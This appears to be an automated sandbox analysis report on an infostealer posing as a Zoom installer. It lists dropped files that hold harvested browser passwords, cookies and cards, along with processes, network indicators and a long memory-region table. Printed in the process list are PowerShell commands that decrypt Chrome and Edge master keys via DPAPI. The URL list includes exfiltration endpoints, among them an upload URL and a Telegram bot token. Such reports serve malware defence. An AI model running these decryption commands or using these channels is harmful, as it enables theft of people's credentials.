Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
ZoomInstaller.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
initial sample
|
||
C:\Users\user\AppData\Local\Ailurophile\Autofills\Autofills.txt
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Ailurophile\Cards\Cards.txt
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Ailurophile\Cookies\Google_Default.txt
|
ASCII text, with very long lines (515)
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web.db
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie
0x21, schema 4, UTF-8, version-valid-for 3
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\history.db
|
SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4,
UTF-8, version-valid-for 4
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.db
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie
0xb, schema 4, UTF-8, version-valid-for 1
|
dropped
|
||
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\webdata.db
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie
0x21, schema 4, UTF-8, version-valid-for 3
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\history.db
|
SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4,
UTF-8, version-valid-for 2
|
dropped
|
||
C:\Users\user\AppData\Local\Ailurophile.zip
|
Zip archive data, at least v2.0 to extract, compression method=store
|
dropped
|
||
C:\Users\user\AppData\Local\Ailurophile\History\Google-Default.txt
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Ailurophile\History\Microsoft-Default.txt
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Ailurophile\Passwords\Google-Default.txt
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Ailurophile\Passwords\Microsoft-Default.txt
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Ailurophile\info.txt
|
Unicode text, UTF-8 text, with very long lines (425)
|
dropped
|
||
C:\Users\user\AppData\Local\Ailurophile\stolen_files.zip
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web.db
|
SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie
0x24, schema 4, UTF-8, version-valid-for 2
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\passwords.db
|
SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie
0xe, schema 4, UTF-8, version-valid-for 1
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\webdata.db
|
SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie
0x24, schema 4, UTF-8, version-valid-for 2
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3z4uwxfe.fci.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cig3xdrr.qj1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mngndqvq.ulc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nau0334u.ney.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p0gvwhgn.j2r.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p3eiig4y.fce.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_umb4p1ct.5co.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vb4beibc.i21.psm1
|
ASCII text, with no line terminators
|
dropped
|
There are 18 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\ZoomInstaller.exe
|
"C:\Users\user\Desktop\ZoomInstaller.exe"
|
||
C:\Windows\System32\wbem\WMIC.exe
|
wmic path win32_videocontroller get caption
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tasklist.exe
|
tasklist
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\wbem\WMIC.exe
|
wmic os get Caption
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\wbem\WMIC.exe
|
wmic os get Version
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command "(Get-Item 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe').VersionInfo.FileVersion"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tasklist.exe
|
tasklist
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250),
$null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey)
-replace '-', ''; Write-Output $decryptedKeyString"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157),
$null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey)
-replace '-', ''; Write-Output $decryptedKeyString"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 9 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://manestvli.shop/upload.php?data=bDkyQVpaZGp1YXE2bU0raWZhUFJtWUNJaGQxN3phMmRsWGljcThhdG1KK1drTGVaZ3AxOTMzKzRqMldDaGJTYXJxbXRwNWQ4cTJaOG5ubVpmOTFxcllLRnRLYXYwTGl1Z0tQRnFYeWRxOCtXcktLcmpvU3NaNnZSbEtlTmJLeW1sbVp0MDVhbmVJeVZpSmljeEpuSHNYMTlwNmQ4ZW5iZmxOMTNySUYwbDZpdTBLaHNnWDJ6WVh5ZHE4K1ZxM3l1bDJUSHA4WFR0YkY5bzlHWmdIZDkyWHZSaEtxV1k5ZWh2TDZ3b0lPaXE2bUJoMzNaZTlGOFpaaDRuSjdEdmR1cWw3S3JabnllZWM5K3A0Q2VqWW10bk1YZnJHMTlvNk9aZjNkKzA1TzdycUNYcXF4bnE5QzRvSUI4ckpxVlo0cmJscXlBYVgyYjBwcTR2WmlubUlDNG0zeDZncGFMdklpZ2w2cXNwS3ZVeDUrV2dOcWNsM2Q5bkh2T2U1MkFkSzJndzc2eFo1WnNyR1Y4bnFQUGdhZUFiUT09&hash=2d6441c1bfc749b0344f
|
188.114.97.3
|
||
https://duckduckgo.com/chrome_newtab
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
https://api.myip.com
|
unknown
|
||
https://duckduckgo.com/ac/?q=
|
unknown
|
||
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
https://api.myip.com/
|
104.26.9.59
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://manestvli.shop/upload.php?
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
|
unknown
|
||
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
|
unknown
|
||
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
|
unknown
|
||
https://api.telegram.org/bot%s/sendMessage
|
unknown
|
||
https://manestvli.shop/upload.php?C:
|
unknown
|
||
https://www.ecosia.org/newtab/
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://api.telegram.org/bot7576282251:AAG0mg-rIFL8SDgfm15Nk4l51UZeLB-cEwU/sendMessage
|
149.154.167.220
|
||
https://ac.ecosia.org/autocomplete?q=
|
unknown
|
||
https://manestvli.shop/upload.php?data=bDkyQVpaZGp1YXE2bU0raWZhUFJtWUNJaGQxN3phMmRsWGljcThhdG1KK1drT
|
unknown
|
||
https://api.telegram.org/bot%s/sendMessagehttps://api.telegram.org/bot%s/sendMessagechat_id=68432125
|
unknown
|
||
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
|
unknown
|
||
https://ailurophilestealer.com/bot
|
unknown
|
||
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://oneget.orgX
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016========
|
unknown
|
||
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
|
unknown
|
||
https://oneget.org
|
unknown
|
||
https://ailurophilestealer.com
|
unknown
|
There are 29 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
manestvli.shop
|
188.114.97.3
|
||
api.telegram.org
|
149.154.167.220
|
||
api.myip.com
|
104.26.9.59
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
||
188.114.97.3
|
manestvli.shop
|
European Union
|
||
104.26.9.59
|
api.myip.com
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
FDDA57F000
|
stack
|
page read and write
|
||
1405E300000
|
heap
|
page execute and read and write
|
||
19C74798000
|
heap
|
page read and write
|
||
1AA4989E000
|
heap
|
page read and write
|
||
7FFD9BB50000
|
trusted library allocation
|
page execute and read and write
|
||
1FAF28B8000
|
heap
|
page read and write
|
||
2976C831000
|
heap
|
page read and write
|
||
19C747AC000
|
heap
|
page read and write
|
||
7FFD9BC40000
|
trusted library allocation
|
page read and write
|
||
1AA49F25000
|
heap
|
page read and write
|
||
7FF6845AA000
|
unkown
|
page write copy
|
||
1AA49F0E000
|
heap
|
page read and write
|
||
C00006C000
|
direct allocation
|
page read and write
|
||
1405C569000
|
heap
|
page read and write
|
||
C0000C8000
|
direct allocation
|
page read and write
|
||
1AA49940000
|
trusted library allocation
|
page read and write
|
||
256386B6000
|
heap
|
page read and write
|
||
19C742C1000
|
heap
|
page read and write
|
||
C00008A000
|
direct allocation
|
page read and write
|
||
C000576000
|
direct allocation
|
page read and write
|
||
2976C835000
|
heap
|
page read and write
|
||
C00041A000
|
direct allocation
|
page read and write
|
||
7FF685593000
|
unkown
|
page readonly
|
||
21DDFB87000
|
heap
|
page read and write
|
||
19C747A9000
|
heap
|
page read and write
|
||
7FF6841C1000
|
unkown
|
page execute read
|
||
C0000A6000
|
direct allocation
|
page read and write
|
||
21DDFBEA000
|
heap
|
page read and write
|
||
21DE01AE000
|
heap
|
page read and write
|
||
19C7488E000
|
heap
|
page read and write
|
||
C00012E000
|
direct allocation
|
page read and write
|
||
19C742ED000
|
heap
|
page read and write
|
||
2FA09FB000
|
stack
|
page read and write
|
||
C000252000
|
direct allocation
|
page read and write
|
||
C0000B6000
|
direct allocation
|
page read and write
|
||
29919255000
|
heap
|
page read and write
|
||
C00028A000
|
direct allocation
|
page read and write
|
||
2976C7E4000
|
heap
|
page read and write
|
||
19C7478C000
|
heap
|
page read and write
|
||
1AA49EFC000
|
heap
|
page read and write
|
||
21DDFBE5000
|
heap
|
page read and write
|
||
FDDA6FB000
|
stack
|
page read and write
|
||
7FF6845EC000
|
unkown
|
page readonly
|
||
2FA097E000
|
stack
|
page read and write
|
||
21DDFC85000
|
heap
|
page read and write
|
||
C00013C000
|
direct allocation
|
page read and write
|
||
1AA49853000
|
heap
|
page read and write
|
||
1AA4980E000
|
heap
|
page read and write
|
||
C000212000
|
direct allocation
|
page read and write
|
||
1AA49847000
|
heap
|
page read and write
|
||
19C7488A000
|
heap
|
page read and write
|
||
2991902C000
|
heap
|
page read and write
|
||
2976C7E7000
|
heap
|
page read and write
|
||
C00015D000
|
direct allocation
|
page read and write
|
||
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
19C74883000
|
heap
|
page read and write
|
||
7FFD9BC80000
|
trusted library allocation
|
page read and write
|
||
4F002FE000
|
stack
|
page read and write
|
||
21DDFBF2000
|
heap
|
page read and write
|
||
25636CE0000
|
heap
|
page readonly
|
||
25636D25000
|
heap
|
page read and write
|
||
29745990000
|
heap
|
page read and write
|
||
1AA49853000
|
heap
|
page read and write
|
||
19C747A0000
|
heap
|
page read and write
|
||
2976C81A000
|
heap
|
page read and write
|
||
25650D2C000
|
heap
|
page read and write
|
||
1407670F000
|
heap
|
page read and write
|
||
19C741E0000
|
trusted library allocation
|
page read and write
|
||
21DE019A000
|
heap
|
page read and write
|
||
FDD9D03000
|
stack
|
page read and write
|
||
C0002FC000
|
direct allocation
|
page read and write
|
||
140765BD000
|
heap
|
page read and write
|
||
7FF685597000
|
unkown
|
page readonly
|
||
C00017A000
|
direct allocation
|
page read and write
|
||
1406E311000
|
trusted library allocation
|
page read and write
|
||
1AA49842000
|
heap
|
page read and write
|
||
7FF684969000
|
unkown
|
page readonly
|
||
2FA07FE000
|
stack
|
page read and write
|
||
FDDA478000
|
stack
|
page read and write
|
||
25636C70000
|
heap
|
page read and write
|
||
2976C790000
|
direct allocation
|
page read and write
|
||
21DDFB8A000
|
heap
|
page read and write
|
||
19C747A9000
|
heap
|
page read and write
|
||
1405C564000
|
heap
|
page read and write
|
||
FDDA1FE000
|
stack
|
page read and write
|
||
19C742AF000
|
heap
|
page read and write
|
||
C000438000
|
direct allocation
|
page read and write
|
||
297456F0000
|
heap
|
page read and write
|
||
7FFD9BB6A000
|
trusted library allocation
|
page read and write
|
||
1AA49836000
|
heap
|
page read and write
|
||
CFBA37B000
|
stack
|
page read and write
|
||
7FFD9BCF0000
|
trusted library allocation
|
page read and write
|
||
7FF68496A000
|
unkown
|
page read and write
|
||
2563A691000
|
trusted library allocation
|
page read and write
|
||
25636C30000
|
heap
|
page read and write
|
||
7FF6845E1000
|
unkown
|
page write copy
|
||
1AA49F1A000
|
heap
|
page read and write
|
||
1AA4986A000
|
heap
|
page read and write
|
||
7FFD9BD00000
|
trusted library allocation
|
page read and write
|
||
140765CE000
|
heap
|
page read and write
|
||
7FF6845AC000
|
unkown
|
page write copy
|
||
1AA49F23000
|
heap
|
page read and write
|
||
2976C7E6000
|
heap
|
page read and write
|
||
1AA49A6A000
|
heap
|
page read and write
|
||
2976C7F1000
|
heap
|
page read and write
|
||
19C74882000
|
heap
|
page read and write
|
||
7FF68496A000
|
unkown
|
page write copy
|
||
1405C53D000
|
heap
|
page read and write
|
||
C000108000
|
direct allocation
|
page read and write
|
||
19C747B5000
|
heap
|
page read and write
|
||
1AA49EFE000
|
heap
|
page read and write
|
||
19C740C0000
|
heap
|
page read and write
|
||
7FFD9BCE9000
|
trusted library allocation
|
page read and write
|
||
2974591C000
|
direct allocation
|
page read and write
|
||
21DDFBE6000
|
heap
|
page read and write
|
||
2976C7FB000
|
heap
|
page read and write
|
||
2976C80A000
|
heap
|
page read and write
|
||
21DE1B2D000
|
heap
|
page read and write
|
||
19C742E8000
|
heap
|
page read and write
|
||
14076700000
|
heap
|
page read and write
|
||
C000000000
|
direct allocation
|
page read and write
|
||
1AA49862000
|
heap
|
page read and write
|
||
1AA49EF8000
|
heap
|
page read and write
|
||
19C76174000
|
heap
|
page read and write
|
||
19C747AF000
|
heap
|
page read and write
|
||
19C742E1000
|
heap
|
page read and write
|
||
1AA4986A000
|
heap
|
page read and write
|
||
21DE01B4000
|
heap
|
page read and write
|
||
C00047C000
|
direct allocation
|
page read and write
|
||
19C74787000
|
heap
|
page read and write
|
||
2976C7EF000
|
heap
|
page read and write
|
||
C000484000
|
direct allocation
|
page read and write
|
||
C00004D000
|
direct allocation
|
page read and write
|
||
2976C8E3000
|
direct allocation
|
page read and write
|
||
21DDFC8A000
|
heap
|
page read and write
|
||
2976C803000
|
heap
|
page read and write
|
||
7FFD9BA4C000
|
trusted library allocation
|
page execute and read and write
|
||
21DE0190000
|
heap
|
page read and write
|
||
25650AE8000
|
heap
|
page read and write
|
||
19C747B7000
|
heap
|
page read and write
|
||
C000010000
|
direct allocation
|
page read and write
|
||
21DDFBBC000
|
heap
|
page read and write
|
||
2976C835000
|
heap
|
page read and write
|
||
7B198FE000
|
stack
|
page read and write
|
||
2976C81B000
|
heap
|
page read and write
|
||
3EA4E7F000
|
stack
|
page read and write
|
||
19C742D8000
|
heap
|
page read and write
|
||
7FFD9BC30000
|
trusted library allocation
|
page read and write
|
||
2976C7F9000
|
heap
|
page read and write
|
||
C000157000
|
direct allocation
|
page read and write
|
||
7FFD9BC50000
|
trusted library allocation
|
page read and write
|
||
C000236000
|
direct allocation
|
page read and write
|
||
1405C52C000
|
heap
|
page read and write
|
||
21DE01B2000
|
heap
|
page read and write
|
||
7FFD9BCE0000
|
trusted library allocation
|
page read and write
|
||
19C747A9000
|
heap
|
page read and write
|
||
1AA49800000
|
heap
|
page read and write
|
||
1405FBF6000
|
trusted library allocation
|
page read and write
|
||
140764F6000
|
heap
|
page execute and read and write
|
||
19C74420000
|
heap
|
page read and write
|
||
19C7617D000
|
heap
|
page read and write
|
||
25636CD0000
|
trusted library allocation
|
page read and write
|
||
C0000A8000
|
direct allocation
|
page read and write
|
||
1405EF42000
|
trusted library allocation
|
page read and write
|
||
C0000CC000
|
direct allocation
|
page read and write
|
||
C000176000
|
direct allocation
|
page read and write
|
||
2976C7F1000
|
heap
|
page read and write
|
||
19C74278000
|
heap
|
page read and write
|
||
21DE1B34000
|
heap
|
page read and write
|
||
1405FC51000
|
trusted library allocation
|
page read and write
|
||
2F9FFDF000
|
stack
|
page read and write
|
||
19C747A9000
|
heap
|
page read and write
|
||
7FFD9BB72000
|
trusted library allocation
|
page read and write
|
||
7FF6845E5000
|
unkown
|
page read and write
|
||
2976C799000
|
direct allocation
|
page read and write
|
||
19C76170000
|
heap
|
page read and write
|
||
C000118000
|
direct allocation
|
page read and write
|
||
1AA49990000
|
heap
|
page read and write
|
||
21DDFBB7000
|
heap
|
page read and write
|
||
1407656B000
|
heap
|
page read and write
|
||
19C742A7000
|
heap
|
page read and write
|
||
2976C81A000
|
heap
|
page read and write
|
||
2FA02FE000
|
stack
|
page read and write
|
||
1405C4E0000
|
heap
|
page read and write
|
||
C000554000
|
direct allocation
|
page read and write
|
||
1405FC16000
|
trusted library allocation
|
page read and write
|
||
21DE01C9000
|
heap
|
page read and write
|
||
19C747B2000
|
heap
|
page read and write
|
||
19C747A0000
|
heap
|
page read and write
|
||
C000600000
|
direct allocation
|
page read and write
|
||
C000184000
|
direct allocation
|
page read and write
|
||
C0000C4000
|
direct allocation
|
page read and write
|
||
25650BF0000
|
heap
|
page read and write
|
||
25636A9E000
|
heap
|
page read and write
|
||
C0003BC000
|
direct allocation
|
page read and write
|
||
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
29745A28000
|
direct allocation
|
page read and write
|
||
19C74287000
|
heap
|
page read and write
|
||
19C742D2000
|
heap
|
page read and write
|
||
1FAF28BA000
|
heap
|
page read and write
|
||
1FAF2A25000
|
heap
|
page read and write
|
||
25650D48000
|
heap
|
page read and write
|
||
19C742E1000
|
heap
|
page read and write
|
||
FDDA67E000
|
stack
|
page read and write
|
||
7FFD9BC10000
|
trusted library allocation
|
page read and write
|
||
2976C810000
|
heap
|
page read and write
|
||
C00057E000
|
direct allocation
|
page read and write
|
||
2976C835000
|
heap
|
page read and write
|
||
19C742D6000
|
heap
|
page read and write
|
||
C000151000
|
direct allocation
|
page read and write
|
||
1AA49861000
|
heap
|
page read and write
|
||
29745980000
|
direct allocation
|
page read and write
|
||
19C76171000
|
heap
|
page read and write
|
||
2976C835000
|
heap
|
page read and write
|
||
29918FE8000
|
heap
|
page read and write
|
||
19C74884000
|
heap
|
page read and write
|
||
19C741E0000
|
trusted library allocation
|
page read and write
|
||
1FAF28AC000
|
heap
|
page read and write
|
||
25650BD0000
|
heap
|
page read and write
|
||
21DDFBA9000
|
heap
|
page read and write
|
||
C00035E000
|
direct allocation
|
page read and write
|
||
1FAF27A0000
|
heap
|
page read and write
|
||
2991903A000
|
heap
|
page read and write
|
||
C000564000
|
direct allocation
|
page read and write
|
||
4F003FE000
|
stack
|
page read and write
|
||
7FF68536E000
|
unkown
|
page readonly
|
||
1AA49874000
|
heap
|
page read and write
|
||
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
21DDFBE5000
|
heap
|
page read and write
|
||
C00022C000
|
direct allocation
|
page read and write
|
||
4F004FE000
|
stack
|
page read and write
|
||
7FFD9BB70000
|
trusted library allocation
|
page execute and read and write
|
||
7FF684965000
|
unkown
|
page read and write
|
||
7FFD9B994000
|
trusted library allocation
|
page read and write
|
||
1AA49897000
|
heap
|
page read and write
|
||
7FFD9BB50000
|
trusted library allocation
|
page read and write
|
||
7FF6841C0000
|
unkown
|
page readonly
|
||
1406E384000
|
trusted library allocation
|
page read and write
|
||
C000513000
|
direct allocation
|
page read and write
|
||
FDDA4F9000
|
stack
|
page read and write
|
||
C000500000
|
direct allocation
|
page read and write
|
||
25636AAC000
|
heap
|
page read and write
|
||
1405C640000
|
heap
|
page read and write
|
||
AA28FFE000
|
stack
|
page read and write
|
||
2976C7EF000
|
heap
|
page read and write
|
||
1AA49F22000
|
heap
|
page read and write
|
||
1407659B000
|
heap
|
page read and write
|
||
1FAF2980000
|
heap
|
page read and write
|
||
2976C81F000
|
heap
|
page read and write
|
||
7FFD9BCA0000
|
trusted library allocation
|
page read and write
|
||
1405C566000
|
heap
|
page read and write
|
||
19C742E7000
|
heap
|
page read and write
|
||
29919016000
|
heap
|
page read and write
|
||
14076460000
|
heap
|
page read and write
|
||
19C742AF000
|
heap
|
page read and write
|
||
19C747B4000
|
heap
|
page read and write
|
||
21DDFBA9000
|
heap
|
page read and write
|
||
21DDFB78000
|
heap
|
page read and write
|
||
7FFD9BA46000
|
trusted library allocation
|
page read and write
|
||
FDDA379000
|
stack
|
page read and write
|
||
2FA067C000
|
stack
|
page read and write
|
||
19C742D9000
|
heap
|
page read and write
|
||
1FAF29A0000
|
heap
|
page read and write
|
||
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
19C74794000
|
heap
|
page read and write
|
||
1FAF28DB000
|
heap
|
page read and write
|
||
25650B9F000
|
heap
|
page read and write
|
||
21DE01B5000
|
heap
|
page read and write
|
||
1AA49853000
|
heap
|
page read and write
|
||
21DE1B21000
|
heap
|
page read and write
|
||
FDDA07E000
|
stack
|
page read and write
|
||
19C7478C000
|
heap
|
page read and write
|
||
C000276000
|
direct allocation
|
page read and write
|
||
19C74287000
|
heap
|
page read and write
|
||
2976C7E4000
|
heap
|
page read and write
|
||
FDDA2FF000
|
stack
|
page read and write
|
||
C000140000
|
direct allocation
|
page read and write
|
||
21DDFB86000
|
heap
|
page read and write
|
||
C00009A000
|
direct allocation
|
page read and write
|
||
2FA06F8000
|
stack
|
page read and write
|
||
21DDFB88000
|
heap
|
page read and write
|
||
7FFD9BB80000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BBA0000
|
trusted library allocation
|
page execute and read and write
|
||
1405C360000
|
heap
|
page read and write
|
||
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB41000
|
trusted library allocation
|
page read and write
|
||
25639633000
|
trusted library allocation
|
page read and write
|
||
C00002C000
|
direct allocation
|
page read and write
|
||
2976C803000
|
heap
|
page read and write
|
||
21DDFBC4000
|
heap
|
page read and write
|
||
C00003A000
|
direct allocation
|
page read and write
|
||
25650AB7000
|
heap
|
page execute and read and write
|
||
7FF6845E2000
|
unkown
|
page read and write
|
||
2976C835000
|
heap
|
page read and write
|
||
19C74794000
|
heap
|
page read and write
|
||
297459F0000
|
direct allocation
|
page read and write
|
||
C000078000
|
direct allocation
|
page read and write
|
||
2976C80B000
|
heap
|
page read and write
|
||
C00007E000
|
direct allocation
|
page read and write
|
||
19C742CB000
|
heap
|
page read and write
|
||
1405C620000
|
trusted library allocation
|
page read and write
|
||
1AA49817000
|
heap
|
page read and write
|
||
2976C80E000
|
heap
|
page read and write
|
||
140765CB000
|
heap
|
page read and write
|
||
21DE0197000
|
heap
|
page read and write
|
||
29919005000
|
heap
|
page read and write
|
||
1405C600000
|
trusted library allocation
|
page read and write
|
||
25636AAA000
|
heap
|
page read and write
|
||
C000148000
|
direct allocation
|
page read and write
|
||
FDDA27E000
|
stack
|
page read and write
|
||
C0001A4000
|
direct allocation
|
page read and write
|
||
1AA49842000
|
heap
|
page read and write
|
||
25638C33000
|
trusted library allocation
|
page read and write
|
||
25638540000
|
heap
|
page execute and read and write
|
||
21DDFB87000
|
heap
|
page read and write
|
||
C000178000
|
direct allocation
|
page read and write
|
||
FDD9D8D000
|
stack
|
page read and write
|
||
C00006E000
|
